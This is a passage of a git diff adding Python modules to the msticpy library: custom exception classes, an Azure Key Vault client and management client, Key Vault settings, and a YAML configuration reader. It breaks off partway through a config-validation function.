+    def __init__(
+        self, *args, help_uri: Union[Tuple[str, str], str, None] = None, **kwargs
+    ):
+        """
+        Create Key Vault missing key exception.
+
+        Parameters
+        ----------
+        help_uri : Union[Tuple[str, str], str, None], optional
+            Override the default help URI.
+
+        """
+        mssg = (
+            "Please verify that the item using this secret is properly"
+            + " configured in in your msticpyconfig.yaml."
+        )
+        add_args = [*args, mssg]
+        uri = help_uri or self.DEF_HELP_URI
+        super().__init__(*add_args, help_uri=uri, **kwargs)
+
+
+class MsticpyAzureConfigError(MsticpyUserConfigError):
+    """Exception class for AzureData."""
+
+    DEF_HELP_URI = (
+        "Using the Azure API connector",
+        "https://msticpy.readthedocs.io/en/latest/data_acquisition/AzureData.html"
+        + "#instantiating-and-connecting-with-an-azure-data-connector",
+    )
+
+    def __init__(
+        self, *args, help_uri: Union[Tuple[str, str], str, None] = None, **kwargs
+    ):
+        """
+        Create Azure data missing configuration exception.
+
+        Parameters
+        ----------
+        help_uri : Union[Tuple[str, str], str, None], optional
+            Override the default help URI.
+
+        """
+        uri = help_uri or self.DEF_HELP_URI
+        super().__init__(*args, help_uri=uri, **kwargs)
+
+
+class MsticpyNotConnectedError(MsticpyUserError):
+    """Exception class for NotConnected errors."""
+
+    DEF_HELP_URI = (
+        "Querying and importing data",
+        "https://msticpy.readthedocs.io/en/latest/DataAcquisition.html"
+        + "#querying-and-importing-data",
+    )
+
+
+class MsticpyNoDataSourceError(MsticpyUserError):
+    """Exception class for missing data source errors."""
+
+    DEF_HELP_URI = (
+        "Querying and importing data",
+        "https://msticpy.readthedocs.io/en/latest/DataAcquisition.html"
+        + "#querying-and-importing-data",
+    )
+
+
+class MsticpyDataQueryError(MsticpyUserError):
+    """Exception class for data query errors."""
+
+    DEF_HELP_URI = (
+        "Query failed",
+        "https://msticpy.readthedocs.io/en/latest/DataAcquisition.html"
+        + "#querying-and-importing-data",
+    )
+
+
+class MsticpyConnectionError(MsticpyUserError):
+    """Exception class for KqlConnection errors."""
+
+    DEF_HELP_URI = (
+        "DataProviders",
+        "https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html",
+    )
+
+
+class MsticpyKqlConnectionError(MsticpyUserError):
+    """Exception class for KqlConnection errors."""
+
+    DEF_HELP_URI = (
+        "Connecting to Microsoft Sentinel",
+        "https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html"
+        + "#connecting-to-an-azure-sentinel-workspace",
+    )
+
+
+class MsticpyImportExtraError(MsticpyUserError, ImportError):
+    """Exception class for Imports that need an extra."""
+
+    DEF_HELP_URI = (
+        "Installing msticpy",
+        "https://msticpy.readthedocs.io/en/latest/getting_started/Installing.html",
+    )
+
+    def __init__(
+        self, *args, help_uri: Union[Tuple[str, str], str, None] = None, **kwargs
+    ):
+        """
+        Create import missing extra exception.
+
+        Parameters
+        ----------
+        help_uri : Union[Tuple[str, str], str, None], optional
+            Override the default help URI.
+        extra : str
+            The name of the setup extra that needs to be installed.
+
+        """
+        extra = kwargs.pop("extra", None)
+        if not extra:
+            raise AttributeError("Keyword argument 'extra' must be supplied")
+        mssg = "".join(
+            [
+                "This feature requires one or more additional packages",
+                " to be installed.\n",
+                "To do this run the command:\n",
+                f"pip install msticpy[{extra}]",
+            ]
+        )
+        add_args = [*args, mssg]
+        uri = help_uri or self.DEF_HELP_URI
+        super().__init__(*add_args, help_uri=uri, **kwargs)
+
+
+class MsticpyAzureConnectionError(MsticpyUserError):
+    """Exception class for Azure Connection errors."""
+
+    DEF_HELP_URI = (
+        "Connecting to Microsoft Sentinel",
+        "https://msticpy.readthedocs.io/en/latest/data_acquisition/AzureData.html"
+        + "#instantiating-and-connecting-with-an-azure-data-connector",
+    )
+
+
+class MsticpyParameterError(MsticpyUserError):
+    """Exception class for missing/incorrect parameters."""
+
+    DEF_HELP_URI = ("MSTICPy documentation", "https://msticpy.readthedocs.io")
+
+    def __init__(
+        self, *args, help_uri: Union[Tuple[str, str], str, None] = None, **kwargs
+    ):
+        """
+        Create parameter exception.
+
+        Parameters
+        ----------
+        help_uri : Union[Tuple[str, str], str, None], optional
+            Override the default help URI.
+        parameters : Union[str, List[str]
+            The name of the bad parameter(s).
+
+        """
+        parameter = kwargs.pop("parameter", None)
+        if not parameter:
+            raise AttributeError("Keyword argument 'parameter' must be supplied")
+        mssg = "One or more parameters were incorrect."
+        if isinstance(parameter, str):
+            parameter = [parameter]
+        add_args = [*args, mssg, ", ".join(parameter)]
+        uri = help_uri or self.DEF_HELP_URI
+        super().__init__(*add_args, help_uri=uri, **kwargs)
diff --git a/msticpy/common/keyvault_client.py b/msticpy/common/keyvault_client.py
new file mode 100644
index 000000000..64904c268
--- /dev/null
+++ b/msticpy/common/keyvault_client.py
@@ -0,0 +1,423 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Keyvault client - adapted from Bluehound code."""
+import base64
+import json
+from typing import Any, List
+
+from azure.core.exceptions import ResourceNotFoundError
+from azure.keyvault.secrets import KeyVaultSecret, SecretClient
+
+from azure.mgmt.keyvault import KeyVaultManagementClient
+from azure.mgmt.keyvault.models import (
+    AccessPolicyEntry,
+    CertificatePermissions,
+    KeyPermissions,
+    Permissions,
+    SecretPermissions,
+    Sku,
+    Vault,
+    VaultCreateOrUpdateParameters,
+    VaultProperties,
+)
+
+from msrestazure.azure_exceptions import CloudError
+
+from .._version import VERSION
+from .azure_auth_core import az_connect_core
+from .exceptions import MsticpyKeyVaultConfigError, MsticpyKeyVaultMissingSecretError
+from .keyvault_settings import KeyVaultSettings
+from .utility import export
+
+__version__ = VERSION
+__author__ = "Matt Richard, Ian Hellen"
+
+
+@export
+class BHKeyVaultClient:
+    """Core KeyVault client."""
+
+    _KEYRING_NAME = "keyvault"
+
+    def __init__(
+        self,
+        tenant_id: str = None,
+        vault_uri: str = None,
+        vault_name: str = None,
+        settings: KeyVaultSettings = None,
+        **kwargs,
+    ):
+        """
+        Initialize the BHKeyVault client.
+
+        Parameters
+        ----------
+        tenant_id : str
+            The tenant ID of the service
+        vault_uri : str, optional
+            The full URI of the keyvault, by default None
+        vault_name : str, optional
+            The name of the keyvault in the public cloud, by default None
+        auth_methods : List[str]
+            The authentication methods to use for Key Vault auth
+            Possible values are:
+            - "env" - to get authentication details from environment varibales
+            - "cli" - to use Azure CLI authentication details
+            - "msi" - to user Managed Service Indenity details
+            - "interactive" - to prompt for interactive login
+        authn_type : str, optional
+            [deprecated - use auth_methods]
+            Authentication mode, by default 'interactive'
+            Supported options are:
+            - 'device' for device code authentication
+            - 'interactive' for interactive browser authentication
+        authority : str, optional
+            The AAD authority - one of 'global', 'usgov', 'de' or 'chi'
+        authority_uri : str, optional
+            The AAD authority URI - overrides `authority`
+        settings : KeyVaultSettings
+            An instance of KeyVaultSettings containing KV parameters.
+        debug : bool, optional
+            [description], by default False
+
+        Raises
+        ------
+        KeyVaultMissingVaultException
+            No Vault name or URI supplied.
+
+        Notes
+        -----
+        The parameter values can also be obtained from the
+        KeyVault section of msticpyconfig.yaml.
+
+
+        """
+        self.debug = kwargs.pop("debug", False)
+        self.settings: KeyVaultSettings = settings or KeyVaultSettings()
+
+        self.tenant_id = tenant_id or self.settings.get("tenantid")
+        if not self.tenant_id:
+            raise MsticpyKeyVaultConfigError(
+                "Could not get TenantId from function parameters or configuration.",
+                "Please add this to the KeyVault section of msticpyconfig.yaml",
+                title="missing tenant ID value.",
+            )
+        self.authn_type = kwargs.pop(
+            "authn_type", self.settings.get("authntype", "interactive")
+        )
+        self.auth_methods = kwargs.pop(
+            "auth_methods", self.settings.get("auth_methods", ["interactive"])
+        )
+
+        # for authority and authority_uri, any parameters take priority
+        # and fall back on settings if not specified.
+        if "authority" in kwargs:
+            self.settings["authority"] = kwargs.pop("authority")
+        self.authority_uri = self.settings.get_tenant_authority_host(
+            authority_uri=kwargs.get("authority_uri"), tenant=self.tenant_id
+        )
+
+        if not vault_uri and not vault_name:
+            if "vaultname" in self.settings:
+                vault_name = self.settings["vaultname"]
+            else:
+                raise MsticpyKeyVaultConfigError(
+                    "Check that you have specified the right value for VaultName"
+                    + " in your configuration",
+                    title="Key Vault vault name not found.",
+                )
+        if vault_uri:
+            self.vault_uri = vault_uri
+        else:
+            vault_uri = self.settings.keyvault_uri
+            if vault_uri:
+                self.vault_uri = vault_uri.format(vault=vault_name)
+            else:
+                cloud = self.settings.cloud
+                raise MsticpyKeyVaultConfigError(
+                    f"Could not determine keyvault URI for national cloud {cloud}.",
+                    "Please verify that you have the correct national cloud"
+                    + "specified in the KeyVault section of msticpyconfig.yaml",
+                    title="no Key Vault URI for national cloud",
+                )
+        if self.debug:
+            print(f"Using Vault URI {self.vault_uri}")
+
+        self.kv_client = self._get_secret_client()
+
+    def _get_secret_client(self):
+        credentials = az_connect_core(auth_methods=self.auth_methods)
+
+        # Create a secret client
+        return SecretClient(self.vault_uri, credentials.modern)
+
+    @property
+    def secrets(self):
+        """Return the list of secret names from the vault."""
+        return [x.id for x in self.kv_client.list_properties_of_secrets()]
+
+    def get_secret(self, secret_name: str) -> Any:
+        """
+        Retrieve a secret from the Vault.
+
+        Parameters
+        ----------
+        secret_name : str
+            Name of the secret
+
+        Returns
+        -------
+        Any
+            The secret value
+
+        Raises
+        ------
+        KeyVaultMissingSecretException
+            Secret not found in the Vault.
+
+        """
+        if "/" in secret_name:
+            # If we're passed the full URL to the secret - extract just the
+            # name
+            secret_name = secret_name.rsplit("/", maxsplit=1)[-1]
+        try:
+            secret_bundle = self.kv_client.get_secret(name=secret_name)
+        except ResourceNotFoundError as err:
+            if self.debug:
+                print(f"Secret: '{secret_name}' missing from vault: {self.vault_uri}")
+            raise MsticpyKeyVaultMissingSecretError(
+                f"Secret name {secret_name} could not be found in {self.vault_uri}",
+                f"Provider returned: {err}",
+                title=f"secret {secret_name} not found.",
+            ) from err
+        if secret_bundle.value is None or not secret_bundle.value:
+            if self.debug:
+                print(f"Secret: '{secret_name}' was empty in vault {self.vault_uri}")
+            raise MsticpyKeyVaultMissingSecretError(
+                f"Secret name {secret_name} in {self.vault_uri}",
+                "has blank or null value.",
+                title=f"secret {secret_name} empty.",
+            )
+        return secret_bundle.value
+
+    def set_secret(self, secret_name: str, value: Any) -> KeyVaultSecret:
+        """
+        Set a secret in the Vault.
+
+        Parameters
+        ----------
+        secret_name : str
+            Name of the secret
+        value: Any
+            Secret value
+
+        Returns
+        -------
+        KeyVaultSecret
+            The secrets bundle for the secret
+
+        """
+        if self.debug:
+            print(f"Storing {secret_name} in {self.vault_uri}")
+        return self.kv_client.set_secret(name=secret_name, value=value)
+
+
+# pylint: disable=too-many-instance-attributes
+@export
+class BHKeyVaultMgmtClient:
+    """Core KeyVault Management client."""
+
+    # pylint: disable=too-many-arguments
+    def __init__(
+        self,
+        tenant_id: str = None,
+        subscription_id: str = None,
+        resource_group: str = None,
+        azure_region: str = None,
+        settings: KeyVaultSettings = None,
+        **kwargs,
+    ):
+        """
+        Initialize BH KeyVault Management Client.
+
+        Parameters
+        ----------
+        tenant_id : str, Optional
+            Tenant ID
+        subscription_id : str, Optional
+            Subscription ID
+        resource_group : str, Optional
+            Resource Group name
+        azure_region : str, Optional
+            Azure region - needed to create a new vault.
+            By default, None
+        settings : KeyVaultSettings
+            An instance of KeyVaultSettings containing KV parameters.
+        mgmt_uri : str, Optional
+            The URI for Azure management endpoints.
+
+        Notes
+        -----
+        The parameter values can also be obtained from the
+        KeyVault section of msticpyconfig.yaml.
+
+        """
+        self.debug = kwargs.pop("debug", False)
+        self.settings: KeyVaultSettings = settings or KeyVaultSettings()
+        self.tenant_id = tenant_id or self.settings.get("tenantid")
+        if not self.tenant_id:
+            raise MsticpyKeyVaultConfigError(
+                "Could not get TenantId from function parameters or configuration.",
+                "Please add this to the KeyVault section of msticpyconfig.yaml",
+                title="missing tenant ID value.",
+            )
+        self.subscription_id = subscription_id or self.settings.get("subscriptionid")
+        if not self.subscription_id:
+            raise MsticpyKeyVaultConfigError(
+                "Could not get SubscriptionId from function parameters or configuration.",
+                "Please add this to the KeyVault section of msticpyconfig.yaml",
+                title="missing SubscriptionId value.",
+            )
+        self._client_uri = kwargs.pop("mgmt_uri", None) or self.settings.mgmt_uri
+        if not self._client_uri:
+            cloud = self.settings.cloud
+            raise MsticpyKeyVaultConfigError(
+                f"Could not obtain an azure management URI for national cloud {cloud}.",
+                "Please verify that you have the correct national cloud"
+                + "specified in the KeyVault section of msticpyconfig.yaml",
+                title="no Azure Management URI for national cloud",
+            )
+
+        self.auth_client = az_connect_core()
+        self.resource_group = resource_group or self.settings.get("resourcegroup")
+        self.azure_region = azure_region or self.settings.get("azureregion")
+
+    # pylint: enable=too-many-arguments
+
+    def list_vaults(self) -> List[str]:
+        """
+        Return a list of vaults for the subscription.
+
+        Returns
+        -------
+        List[str]
+            Vault names
+
+        """
+        mgmt = KeyVaultManagementClient(self.auth_client.legacy, self.subscription_id)
+        return [v.name for v in mgmt.vaults.list()]
+
+    def get_vault_uri(self, vault_name: str) -> str:
+        """
+        Return the URI for a vault name.
+
+        Parameters
+        ----------
+        vault_name : str
+            The Vault name.
+
+        Returns
+        -------
+        str
+            Vault URI.
+
+        """
+        mgmt = KeyVaultManagementClient(self.auth_client.legacy, self.subscription_id)
+        try:
+            vault = mgmt.vaults.get(self.resource_group, vault_name)
+        except (CloudError, ResourceNotFoundError) as cloud_err:
+            raise MsticpyKeyVaultConfigError(
+                "Check that you have specified the right value for VaultName"
+                + " in your configuration",
+                f"Error returned from provider was {cloud_err}",
+                title=f"Key Vault vault '{vault_name}' not found.",
+            ) from cloud_err
+        return vault.properties.vault_uri
+
+    def create_vault(self, vault_name: str) -> Vault:
+        """
+        Create new or update existing vault.
+
+        Parameters
+        ----------
+        vault_name : str
+            Name of the Vault
+
+        Returns
+        -------
+        Vault
+            The Vault object.
+
+        """
+        if not self.azure_region:
+            raise MsticpyKeyVaultConfigError(
+                "Could not get Azure region in which to create the vault.",
+                "Please add AzureRegion to the KeyVault section of msticpyconfig.yaml",
+                title="missing AzureRegion value.",
+            )
+        parameters = self._get_params()
+        if not self.resource_group:
+            raise MsticpyKeyVaultConfigError(
+                "Could not get Azure resource group in which to create the vault.",
+                "Please add ResourceGroup to the KeyVault section of msticpyconfig.yaml",
+                title="missing ResourceGroup value.",
+            )
+        mgmt = KeyVaultManagementClient(self.auth_client.legacy, self.subscription_id)
+        return mgmt.vaults.create_or_update(
+            self.resource_group, vault_name, parameters
+        ).result()
+
+    def _get_params(self):
+        """Build the vault parameters block."""
+        oid = _user_oid(self.auth_client.legacy.token)
+        sec_perms_all = [perm.value for perm in SecretPermissions]
+        key_perms_all = [perm.value for perm in KeyPermissions]
+        cert_perms_all = [perm.value for perm in CertificatePermissions]
+        permissions = Permissions()
+        permissions.keys = key_perms_all
+        permissions.secrets = sec_perms_all
+        permissions.certificates = cert_perms_all
+
+        policy = AccessPolicyEntry(
+            tenant_id=self.tenant_id, object_id=oid, permissions=permissions
+        )
+
+        properties = VaultProperties(
+            tenant_id=self.tenant_id,
+            sku=Sku(name="standard", family="A"),
+            access_policies=[policy],
+        )
+        parameters = VaultCreateOrUpdateParameters(
+            location=self.azure_region, properties=properties
+        )
+        parameters.properties.enabled_for_deployment = True
+        parameters.properties.enabled_for_disk_encryption = True
+        parameters.properties.enabled_for_template_deployment = True
+        return parameters
+
+
+# pylint: enable=too-many-instance-attributes
+
+
+def _user_oid(token) -> str:
+    """
+    Return the user Object ID.
+
+    Returns
+    -------
+    str
+        User OID.
+
+    """
+    data = _get_parsed_token_data(token)
+    return data.get("oid")
+
+
+def _get_parsed_token_data(token) -> Any:
+    tok_data = token
+    tok_data = tok_data.split(".")[1]
+    tok_data += "=" * ((4 - len(tok_data) % 4) % 4)
+    return json.loads(base64.b64decode(tok_data))
diff --git a/msticpy/common/keyvault_settings.py b/msticpy/common/keyvault_settings.py
new file mode 100644
index 000000000..bc418b1f0
--- /dev/null
+++ b/msticpy/common/keyvault_settings.py
@@ -0,0 +1,240 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Keyvault client settings."""
+
+import warnings
+from typing import Any, List, Optional
+
+from .._version import VERSION
+from . import pkg_config as config
+from .azure_auth_core import AzureCloudConfig
+from .exceptions import MsticpyKeyVaultConfigError
+from .utility import export
+from .cloud_mappings import create_cloud_ep_dict, create_cloud_suf_dict
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@export
+class KeyVaultSettings:
+    """
+    KeyVaultSettings class - reads settings from msticpyconfig.
+
+    Notes
+    -----
+    The KeyVault section in msticpyconfig.yaml can contain
+    the following::
+
+        KeyVault:
+            TenantId: {tenantid-to-use-for-authentication}
+            SubscriptionId: {subscriptionid-containing-vault}
+            ResourceGroup: {resource-group-containing-vault}
+            AzureRegion: {region-for-vault}
+            VaultName: {vault-name}
+            UseKeyring: True
+            Authority: global
+
+    `SubscriptionId`, `ResourceGroup` and `AzureRegion` are only
+    used when creating new vaults.
+    `UseKeyring` instructs the `SecretsClient` to cache Keyvault
+    secrets locally using Python keyring.
+    `Authority` is one of 'global', 'usgov', 'de', 'cn'
+    Alternatively, you can specify `AuthorityURI` with the value
+    pointing to the URI for logon requests.
+
+    """
+
+    AAD_AUTHORITIES = create_cloud_ep_dict("active_directory")
+    RES_MGMT_URIS = create_cloud_ep_dict("resource_manager")
+    KV_SUFFIXES = create_cloud_suf_dict("keyvault_dns")
+    KV_URIS = {
+        cloud: f"https://{{vault}}{suffix}" for cloud, suffix in KV_SUFFIXES.items()
+    }
+
+    # Azure CLI Client ID
+    CLIENT_ID = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"  # xplat
+
+    def __init__(self):
+        """
+        Initialize new instance of KeyVault Settings.
+
+        Raises
+        ------
+        MsticpyKeyVaultConfigError
+            If no Key Vault settings are found in
+            msticpyconfig.yaml.
+
+        """
+        self.authority: Optional[str] = None
+        self.auth_methods: List[str] = []
+        try:
+            kv_config = config.get_config("KeyVault")
+        except KeyError as err:
+            raise MsticpyKeyVaultConfigError(
+                "No KeyVault section found in msticpyconfig.yaml",
+                title="missing Key Vault configuration",
+            ) from err
+        norm_settings = {key.casefold(): val for key, val in kv_config.items()}
+        self.__dict__.update(norm_settings)
+
+        self._get_auth_methods_from_settings()
+        self._get_authority_from_settings()
+
+    def _get_auth_methods_from_settings(self):
+        """Retrieve authentication methods from settings."""
+        self.auth_methods = AzureCloudConfig().auth_methods
+
+    def _get_authority_from_settings(self):
+        """Get the authority (AAD) URI from settings."""
+        if "authorityuri" in self:
+            # For BlueHound compat - the "authority_uri" can be set directly
+            # as a property of the object
+            rev_lookup = {uri.casefold(): code for code, uri in self.AAD_AUTHORITIES}
+            self.authority = rev_lookup.get(
+                self["authorityuri"].casefold(), "global"
+            ).casefold()
+        elif not self.authority:
+            self.authority = AzureCloudConfig().cloud
+
+    def __getitem__(self, key: str):
+        """Allow property get using dictionary key syntax."""
+        if key.casefold() in self.__dict__:
+            return self.__dict__[key.casefold()]
+        raise KeyError
+
+    def __setitem__(self, key: str, value: Any):
+        """Allow property set using dictionary key syntax."""
+        self.__dict__[key.casefold()] = value
+
+    def __contains__(self, key: str):
+        """Return true if key is a valid attribute."""
+        return key.casefold() in self.__dict__
+
+    def get(self, key: str, default: Any = None) -> Any:
+        """Return dict value or default."""
+        return self.__dict__.get(key.casefold(), default)
+
+    @property
+    def cloud(self) -> str:
+        """Return the cloud for the settings."""
+        return self.get("authority", "global").casefold()
+
+    @property
+    def authority_uri(self) -> str:
+        """
+        Return authority URI for cloud.
+
+        Returns
+        -------
+        str
+            Authority URI
+
+        """
+        if "authorityuri" in self:
+            return self["authorityuri"]
+        if self.cloud in self.AAD_AUTHORITIES:
+            return self.AAD_AUTHORITIES[self.cloud]
+        return self.AAD_AUTHORITIES["global"]
+
+    @property
+    def keyvault_uri(self) -> Optional[str]:
+        """Return KeyVault URI template for current cloud."""
+        kv_uri = self.KV_URIS.get(self.cloud)
+        if not kv_uri:
+            mssg = f"Could not find a valid KeyVault endpoint for {self.cloud}"
+            warnings.warn(mssg)
+        return kv_uri
+
+    @property
+    def mgmt_uri(self) -> Optional[str]:
+        """Return Azure management URI template for current cloud."""
+        mgmt_uri = self.RES_MGMT_URIS.get(self.cloud)
+        if not mgmt_uri:
+            mssg = f"Could not find a valid KeyVault endpoint for {self.cloud}"
+            warnings.warn(mssg)
+        return mgmt_uri
+
+    def get_tenant_authority_uri(
+        self, authority_uri: str = None, tenant: str = None
+    ) -> str:
+        """
+        Return authority URI for tenant.
+
+        Parameters
+        ----------
+        authority_uri : str, optional
+            The authority URI - otherwise try to retrieve
+            from settings
+        tenant : str, optional
+            TenantID or name, by default None.
+            If not passed as a parameter try to get tenant from
+            KeyVault configuration in msticpyconfig.yaml
+
+        Returns
+        -------
+        str
+            Tenant Authority
+
+        Raises
+        ------
+        KeyVaultConfigException
+            If tenant is not defined.
+
+        """
+        auth = authority_uri or self.authority_uri.strip()
+        if not tenant:
+            tenant = self.get("tenantid")
+        if not tenant:
+            raise MsticpyKeyVaultConfigError(
+                "Could not get TenantId from function parameters or configuration.",
+                "Please add this to the KeyVault section of msticpyconfig.yaml",
+                title="missing tenant ID value.",
+            )
+        if auth.endswith("/"):
+            return auth + tenant.strip()
+        return auth + "/" + tenant.strip()
+
+    def get_tenant_authority_host(
+        self, authority_uri: str = None, tenant: str = None
+    ) -> str:
+        """
+        Return tenant authority URI with no leading scheme.
+
+        Parameters
+        ----------
+        authority_uri : str, optional
+            The authority URI - otherwise try to retrieve
+            from settings
+        tenant : str, optional
+            TenantID or name, by default None.
+            If not passed as a parameter try to get tenant from
+            KeyVault configuration in msticpyconfig.yaml
+
+        Returns
+        -------
+        str
+            Tenant Authority
+
+        Raises
+        ------
+        KeyVaultConfigException
+            If tenant is not defined.
+
+        """
+        if not tenant:
+            tenant = self.get("tenantid")
+        if not tenant:
+            raise MsticpyKeyVaultConfigError(
+                "Could not get TenantId from function parameters or configuration.",
+                "Please add this to the KeyVault section of msticpyconfig.yaml",
+                title="missing tenant ID value.",
+            )
+        return (
+            self.get_tenant_authority_uri(authority_uri, tenant)
+            .lower()
+            .replace("https://", "")
+        )
diff --git a/msticpy/common/pkg_config.py b/msticpy/common/pkg_config.py
new file mode 100644
index 000000000..1af0d1df8
--- /dev/null
+++ b/msticpy/common/pkg_config.py
@@ -0,0 +1,451 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Package configuration reader.
+
+Reads default configuration from package file `msticpyconfig.yaml`.
+Optionally reads custom configuration from file specified in environment
+variable `MSTICPYCONFIG`. If this is not defined the package will look for
+a file `msticpyconfig.yaml` in the current directory.
+
+Default settings are accessible as an attribute `default_settings`.
+Custom settings are accessible as an attribute `custom_settings`.
+Consolidated settings are accessible as an attribute `settings`.
+
+"""
+from importlib.util import find_spec
+import os
+from pathlib import Path
+from typing import Any, Dict, Optional, Callable
+
+import pkg_resources
+import yaml
+from yaml.error import YAMLError
+
+from . import exceptions
+from .exceptions import MsticpyUserConfigError
+from .utility import is_valid_uuid
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+_CONFIG_FILE: str = "msticpyconfig.yaml"
+_CONFIG_ENV_VAR: str = "MSTICPYCONFIG"
+_DP_KEY = "DataProviders"
+_AZ_SENTINEL = "AzureSentinel"
+_AZ_CLI = "AzureCLI"
+
+# pylint: disable=invalid-name
+default_settings: Dict[str, Any] = {}
+custom_settings: Dict[str, Any] = {}
+settings: Dict[str, Any] = {}
+
+
+def _get_current_config() -> Callable[[Any], Optional[str]]:
+    """Closure for holding path of config file."""
+    _current_conf_file: Optional[str] = None
+
+    def _current_config(file_path: Optional[str] = None) -> Optional[str]:
+        nonlocal _current_conf_file  # noqa
+        if file_path is not None:
+            _current_conf_file = file_path
+        return _current_conf_file
+
+    return _current_config
+
+
+_CURRENT_CONF_FILE = _get_current_config()
+
+
+def current_config_path() -> Optional[str]:
+    """
+    Return the path of the current config file, if any.
+
+    Returns
+    -------
+    Optional[str]
+        path of the current config file
+
+    """
+    return _CURRENT_CONF_FILE(None)
+
+
+def refresh_config():
+    """Re-read the config settings."""
+    # pylint: disable=global-statement
+    global default_settings, custom_settings, settings
+    default_settings = _get_default_config()
+    custom_settings = _get_custom_config()
+    custom_settings = _create_data_providers(custom_settings)
+    settings = _consolidate_configs(default_settings, custom_settings)
+
+
+def get_config(setting_path: str) -> Any:
+    """
+    Return setting item for path.
+
+    Parameters
+    ----------
+    setting_path : str
+        Path to setting item expressed as dot-separated
+        string
+
+    Returns
+    -------
+    Any
+        The item at the path location.
+
+    """
+    path_elems = setting_path.split(".")
+    cur_node = settings
+    for elem in path_elems:
+        cur_node = cur_node.get(elem, None)
+        if cur_node is None:
+            raise KeyError(f"{elem} value of {setting_path} is not a valid path")
+    return cur_node
+
+
+def set_config(setting_path: str, value: Any):
+    """
+    Set setting value for path.
+
+    Parameters
+    ----------
+    setting_path : str
+        Path to setting item expressed as dot-separated
+        string
+    value : Any
+        The value to set.
+
+    """
+    path_elems = setting_path.split(".")
+    cur_node = settings
+    for elem in path_elems:
+        if elem in cur_node:
+            cur_node[elem] = value
+            break
+        cur_node = cur_node.get(elem, None)
+        if cur_node is None:
+            raise KeyError(f"{elem} value of {setting_path} is not a valid path")
+    return cur_node
+
+
+def _read_config_file(config_file: str) -> Dict[str, Any]:
+    """
+    Read a yaml config definition file.
+
+    Parameters
+    ----------
+    config_file : str
+        Path to yaml config file
+
+    Returns
+    -------
+    Dict
+        Configuration settings
+
+    """
+    if Path(config_file).is_file():
+        with open(config_file, "r", encoding="utf-8") as f_handle:
+            # use safe_load instead of load
+            try:
+                return yaml.safe_load(f_handle)
+            except YAMLError as yml_err:
+                raise MsticpyUserConfigError(
+                    f"Check that your {config_file} is valid YAML.",
+                    "The following error was encountered",
+                    str(yml_err),
+                    title="config file could not be read",
+                ) from yml_err
+    return {}
+
+
+def _consolidate_configs(
+    def_config: Dict[str, Any], cust_config: Dict[str, Any]
+) -> Dict[str, Any]:
+    resultant_config = {}
+    resultant_config.update(def_config)
+
+    _override_config(resultant_config, cust_config)
+    return resultant_config
+
+
+def _override_config(base_config: Dict[str, Any], new_config: Dict[str, Any]):
+    for c_key, c_item in new_config.items():
+        if c_item is None:
+            continue
+        if isinstance(base_config.get(c_key), dict):
+            _override_config(base_config[c_key], new_config[c_key])
+        else:
+            base_config[c_key] = new_config[c_key]
+
+
+def _get_default_config():
+    """Return the package default config file."""
+    conf_file = None
+    package = "msticpy"
+    try:
+        conf_file = pkg_resources.resource_filename(package, _CONFIG_FILE)
+    except ModuleNotFoundError as mod_err:
+        # if all else fails we try to find the package default config somewhere
+        # in the package tree - we use the first one we find
+        pkg_root = _get_pkg_path("msticpy")
+        if not pkg_root:
+            raise MsticpyUserConfigError(
+                f"Unable to locate the package default {_CONFIG_FILE}",
+                "msticpy package may be corrupted.",
+                title=f"Package {_CONFIG_FILE} missing.",
+            ) from mod_err
+        conf_file = next(iter(pkg_root.glob("**/" + _CONFIG_FILE)))
+    if conf_file:
+        return _read_config_file(conf_file)
+    return {}
+
+
+def _get_custom_config():
+    config_path = os.environ.get(_CONFIG_ENV_VAR, None)
+    if config_path and Path(config_path).is_file():
+        _CURRENT_CONF_FILE(str(Path(config_path).resolve()))
+        return _read_config_file(config_path)
+
+    if Path(_CONFIG_FILE).is_file():
+        _CURRENT_CONF_FILE(str(Path(".").joinpath(_CONFIG_FILE).resolve()))
+        return _read_config_file(_CONFIG_FILE)
+    return {}
+
+
+def _get_pkg_path(pkg_name):
+    current_path = Path(__file__)
+    while current_path.name != pkg_name:
+        if current_path == current_path.parent:
+            return None
+        current_path = current_path.parent
+    return current_path
+
+
+def _create_data_providers(mp_config: Dict[str, Any]) -> Dict[str, Any]:
+    if mp_config.get(_DP_KEY) is None:
+        mp_config[_DP_KEY] = {}
+    data_providers = mp_config[_DP_KEY]
+
+    az_sent_config = mp_config.get(_AZ_SENTINEL)
+    if az_sent_config and az_sent_config.get("Workspaces"):
+        for section, prov_settings in mp_config[_AZ_SENTINEL]["Workspaces"].items():
+            sec_name = f"{_AZ_SENTINEL}_{section}"
+            if sec_name in data_providers:
+                continue
+            data_providers[sec_name] = {"Args": prov_settings}
+    az_cli_config = mp_config.get(_AZ_CLI)
+    if az_cli_config and _AZ_CLI not in data_providers:
+        data_providers[_AZ_CLI] = mp_config[_AZ_CLI]
+    return mp_config
+
+
+# read initial config when first imported.
+refresh_config()
+
+
+def validate_config(mp_config: Dict[str, Any] = None, config_file: str = None):
+    """
+    Validate msticpy config settings.
+
+    Parameters
+    ----------
+    mp_config : Dict[str, Any], optional
+        The settings dictionary, by default it will
+        check the currently loaded settings.
+    config_file : str
+        path to config file to check, by default None
+
+    """
+    if config_file:
+        mp_config = _read_config_file(config_file)
+    if not (mp_config or config_file):
+        mp_config = settings
+
+    if not isinstance(mp_config, dict):
+        raise TypeError("Unknown format for configuration settings.")
+
+    mp_errors, mp_warn = _validate_azure_sentinel(mp_config=mp_config)
+
+    auth_key_providers = [
+        "OTX",
+        "VirusTotal",
+        "XForce",
+        "OpenPageRank",
+        "GeoIPLite",
+        "IPStack",
+        "RiskIQ",
+        "IntSights",
+    ]
+    for conf_section in ["TIProviders", "OtherProviders", _DP_KEY]:
+        prov_errors, prov_warn = _check_provider_settings(
